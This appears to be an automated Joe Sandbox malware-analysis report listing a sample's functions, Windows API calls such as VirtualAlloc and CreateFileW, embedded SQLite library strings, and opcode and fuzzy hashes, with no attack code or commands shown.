Instruction ID: 7ad099ed111c6d89017016cd5ef87b6ea0de3c4f3f8ba8aa12ba651864b9b613
Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
Instruction Fuzzy Hash: AB51B6B1D00109DFDF04CF84D894BEEBBB5FB48318F24955DD516AB280D775AA85CBA0

Function 02EEB9B0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,02EEB30F,00003000,00000040), ref: 02EEBA34

Strings

VirtualAlloc, xrefs: 02EEBA19, 02EEBA1C

Memory Dump Source

Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction ID: 1cbd641ca1a66a2f6c295437bb26164b0ce479e4218d40640305f42725e95b94
Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction Fuzzy Hash: 79114260D082CDDEEF01DBE8C4097EFBFB55F11708F044098D5456B282D2BA57588BB6

Non-executed Functions

Function 02EEC510 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a568a7dc076fac4237d36aa73511bb81ae5ea1128cbd7157671a2a4345687388
Instruction ID: fb53fbf2b461b35d6408dc6fa5903007cbe808f59fa336274b3a7d372e0377d0
Opcode Fuzzy Hash: a568a7dc076fac4237d36aa73511bb81ae5ea1128cbd7157671a2a4345687388
Instruction Fuzzy Hash: 4841A171D1051C9BDF48CFADC891AEEBBF2AF88201F648299D516AB345D730AB41DB80

Analysis Process: kat2B07.tmpPID: 204, Parent PID: 2112COMMON

Execution Graph

Execution Coverage:	0.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	86
Total number of Limit Nodes:	12

Executed Functions

Function 1D744CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1D744EE1

Strings

exclusive, xrefs: 1D744E81
winOpen, xrefs: 1D745110
delayed %dms for lock/sharing conflict at line %d, xrefs: 1D744FB5
psow, xrefs: 1D7451F5

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 12c698d0b923f16a1f5f30a447e0c950ab673321e2eb1048f2a5493b0758fce4
Instruction ID: 56d79ae7f314fb1d9345e7898ae0fba0fa1d9d0f07589070667d8d66110bac18
Opcode Fuzzy Hash: 12c698d0b923f16a1f5f30a447e0c950ab673321e2eb1048f2a5493b0758fce4
Instruction Fuzzy Hash: 4DF1CD71A083119BDB018F24C8C4B2A77F4BF85369F248A6EF945C7291DB75E844CB93

Function 1D9105B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,CE37D569,?,1D9106F5,?,?), ref: 1D910675

Strings

ext-ms-, xrefs: 1D91061F
api-ms-, xrefs: 1D91060B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: aacd322767f75ac4a6ab84b828ecb19fa476838fec797e10ede83f8f85eb9b07
Instruction ID: a787166207dd71b85294b7af74dd3c2e0709a578541277154c5a992402183afe
Opcode Fuzzy Hash: aacd322767f75ac4a6ab84b828ecb19fa476838fec797e10ede83f8f85eb9b07
Instruction Fuzzy Hash: 8521E732B05136A7D7139B61CC85B9A7B6CAB827F0F110329E91DEF281D635ED00CAD6

Function 1D73FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 1D73FE03

Strings

winRead, xrefs: 1D73FE3D
delayed %dms for lock/sharing conflict at line %d, xrefs: 1D73FE78

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: fc0080910cc290b8271d8080e0614a61a3e7aa759b3348354cd457f0820b2a61
Instruction ID: 8bdf069ea7a3778dd896a6dc89a7f0c5f98d99297349a8694c1a0d348b02bf81
Opcode Fuzzy Hash: fc0080910cc290b8271d8080e0614a61a3e7aa759b3348354cd457f0820b2a61
Instruction Fuzzy Hash: BB410772608345BBC304DE64DD859ABF7A8FF84265F84092EF68483652D735E9188BA3

Function 1D8E066B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,1D8E0513,?,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E0678
GetLastError.KERNEL32(?,1D8E0513,?,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E0682
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 1D8E06AA

Strings

api-ms-, xrefs: 1D8E068F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9ee83f4919f313c7feaae0c3dd5375538963c37ca7d88e139241ff6b8a86dd05
Instruction ID: 586bea5dba7a4fb493aeb4764e676003e023ed56503b75a482657d7a216b8ece
Opcode Fuzzy Hash: 9ee83f4919f313c7feaae0c3dd5375538963c37ca7d88e139241ff6b8a86dd05
Instruction Fuzzy Hash: 78E04870244316B7EB101EA1DC4AB593F649B427D1F104830F90CE41A2D775A951CE59

Function 1D7604D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

failed to allocate %u bytes of memory, xrefs: 1D7604E7

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: 53020f8799999e0bf787a246d1ff2ea44be64d422e1145c0d22084779b35e2f8
Instruction ID: bbae24e07ed71f1d31305c0b366879e8b33641a3c173070659175a749f86b078
Opcode Fuzzy Hash: 53020f8799999e0bf787a246d1ff2ea44be64d422e1145c0d22084779b35e2f8
Instruction Fuzzy Hash: 91D02226D8C63273C3221180FC00ACB3E508B901B2F068034FE8C19232E655A85083E3

Function 1D8E04C2 Relevance: 3.1, APIs: 2, Instructions: 67
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E0545
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E054F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: c8b9334e45d6d5d454c5eadc3d0c3fb81f5b6c10811d305ca9a3be592fc1ab7a
Instruction ID: 11fa8c254111d9d0ac1f66b30b1bc824b1e4045a4b2e5029d3e5ca2bf45f8fa8
Opcode Fuzzy Hash: c8b9334e45d6d5d454c5eadc3d0c3fb81f5b6c10811d305ca9a3be592fc1ab7a
Instruction Fuzzy Hash: EC115C366052369FCB12CE54D8809AE77B4BB4B6D07104A69E905AB244E634DA43CFD2

Function 1D9106B1 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8c09af3453851cd0a01f156f07df455e78b2cf8d5a7edd1d3164c25338616d7
Instruction ID: e4a0dd339134255a685de222ac904f68a7dd75a2d46f3c296f177015f125d02a
Opcode Fuzzy Hash: a8c09af3453851cd0a01f156f07df455e78b2cf8d5a7edd1d3164c25338616d7
Instruction Fuzzy Hash: D50196377042399FDF078969DCC0A6A37A9BBC26707114728F9089F184DA369941CF91

Non-executed Functions

Function 1D814140 Relevance: 47.7, APIs: 14, Strings: 13, Instructions: 461COMMON

Download Yara Rule

Strings

SELECT parentnode FROM %Q.'%q_parent' WHERE nodeno=?1, xrefs: 1D814498
Dimension %d of cell %d on node %lld is corrupt relative to parent, xrefs: 1D81444D
Rtree depth out of range (%d), xrefs: 1D81428E
Dimension %d of cell %d on node %lld is corrupt, xrefs: 1D8143D7
%_parent, xrefs: 1D8144D4, 1D81451E
SELECT data FROM %Q.'%q_node' WHERE nodeno=?, xrefs: 1D814166
Mapping (%lld -> %lld) missing from %s table, xrefs: 1D8144E6, 1D8145C2
%_rowid, xrefs: 1D8145B0, 1D8145FA
SELECT nodeno FROM %Q.'%q_rowid' WHERE rowid=?1, xrefs: 1D814574
Node %lld missing from database, xrefs: 1D814230
Node %lld is too small (%d bytes), xrefs: 1D81425A
Found (%lld -> %lld) in %s table, expected (%lld -> %lld), xrefs: 1D814527, 1D814603
Node %lld is too small for cell count of %d (%d bytes), xrefs: 1D81432B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %_parent$%_rowid$Dimension %d of cell %d on node %lld is corrupt$Dimension %d of cell %d on node %lld is corrupt relative to parent$Found (%lld -> %lld) in %s table, expected (%lld -> %lld)$Mapping (%lld -> %lld) missing from %s table$Node %lld is too small (%d bytes)$Node %lld is too small for cell count of %d (%d bytes)$Node %lld missing from database$Rtree depth out of range (%d)$SELECT data FROM %Q.'%q_node' WHERE nodeno=?$SELECT nodeno FROM %Q.'%q_rowid' WHERE rowid=?1$SELECT parentnode FROM %Q.'%q_parent' WHERE nodeno=?1
API String ID: 0-1352829109
Opcode ID: 9a3974aac1e8b91f04952c4850cc4b899ae45451d3de06c1a343e1d766311573
Instruction ID: 850fd0ad0f6585927033bc0ada68a463a9f7f8b3d2da4c3400ae30a76b98ccb9
Opcode Fuzzy Hash: 9a3974aac1e8b91f04952c4850cc4b899ae45451d3de06c1a343e1d766311573
Instruction Fuzzy Hash: 4CF122B1808250AFC7058F2CDC84A2BBBB8FF85354F05496DF9499B212E735E558CBA3

Function 1D870480 Relevance: 30.2, APIs: 8, Strings: 9, Instructions: 476COMMON

Download Yara Rule

Strings

no such %s mode: %s, xrefs: 1D870922
lhos, xrefs: 1D8705A1
mode, xrefs: 1D870867
cach, xrefs: 1D87082B
loca, xrefs: 1D870598
file, xrefs: 1D8704DA
no such vfs: %s, xrefs: 1D87099A
%s mode not allowed: %s, xrefs: 1D8709EC
invalid uri authority: %.*s, xrefs: 1D8705C2

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s mode not allowed: %s$cach$file$invalid uri authority: %.*s$lhos$loca$mode$no such %s mode: %s$no such vfs: %s
API String ID: 0-1127695371
Opcode ID: 5446e2379d70be0561770a4d61b3ed398f9936d80116f639e229a230a0cce27d
Instruction ID: 341fbf3d33b4e7be9b53151003fbb38bae242a7e0f528259dba929136e765a96
Opcode Fuzzy Hash: 5446e2379d70be0561770a4d61b3ed398f9936d80116f639e229a230a0cce27d
Instruction Fuzzy Hash: 95F116B89083A68FE7118E24C4A077ABBB2BF86314F54465DF4D94B392D7369447CB43

Function 1D758680 Relevance: 28.6, APIs: 9, Strings: 7, Instructions: 550COMMON

Download Yara Rule

Strings

SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %s, xrefs: 1D7598F1
parse error in rank function: %s, xrefs: 1D7597FF
%s: table does not support scanning, xrefs: 1D759979
ASC, xrefs: 1D7598BA
recursively defined fts5 content table, xrefs: 1D7586C5
, xrefs: 1D759848
DESC, xrefs: 1D7598C2, 1D7598D6

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: $%s: table does not support scanning$ASC$DESC$SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %s$parse error in rank function: %s$recursively defined fts5 content table
API String ID: 0-2381147695
Opcode ID: 20e95371b2d3ae55ef0e862be42fbd4850fe2b1865436354de1a28080467accd
Instruction ID: 895d5e3717091d5162872d8d5492257441e1e5b4ef54f2a50e0faca6c513d44a
Opcode Fuzzy Hash: 20e95371b2d3ae55ef0e862be42fbd4850fe2b1865436354de1a28080467accd
Instruction Fuzzy Hash: AB22CCB1904351DFDB04CF25C880B6ABBF4BF8A324F05492AF9499B251E735E855CB93

Function 1D85D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D85DAD6, 1D85DE39
API called with NULL prepared statement, xrefs: 1D85DA9B, 1D85DDFE
API called with finalized prepared statement, xrefs: 1D85DAB0, 1D85DE13
%s at line %d of [%.10s], xrefs: 1D85DADB, 1D85DE3E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D85DACC, 1D85DE2F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 044d62dfe33330cf7c323d3209777318f74d2a39d5ad9b1c17300aa8df55342e
Instruction ID: 74eb6cc5f4838edf92c1cb7575fdcbdba2b8072515c8c46271e93412623877f5
Opcode Fuzzy Hash: 044d62dfe33330cf7c323d3209777318f74d2a39d5ad9b1c17300aa8df55342e
Instruction Fuzzy Hash: B212E2B4904741ABE7218F28DC48B6B77E4BF45318F014A2CFD9987342E776E4068BA3

Function 1D7466C0 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

_shape does not contain a valid polygon, xrefs: 1D746816

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: _shape does not contain a valid polygon
API String ID: 0-1814939628
Opcode ID: 1ed3f23c7921d0abacd90dfc54f03eac3434c13759e5f360ec09097d0bc1aa3a
Instruction ID: 0a197041e102b68f536f82c0711a5590660cff53280b647538297932fa0346c8
Opcode Fuzzy Hash: 1ed3f23c7921d0abacd90dfc54f03eac3434c13759e5f360ec09097d0bc1aa3a
Instruction Fuzzy Hash: 3EE1E1B5908301DFC312DF14D880AAFBBE8AF85724F25892EF99957211E731E944CB93

Function 1D75B400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 1D75B696
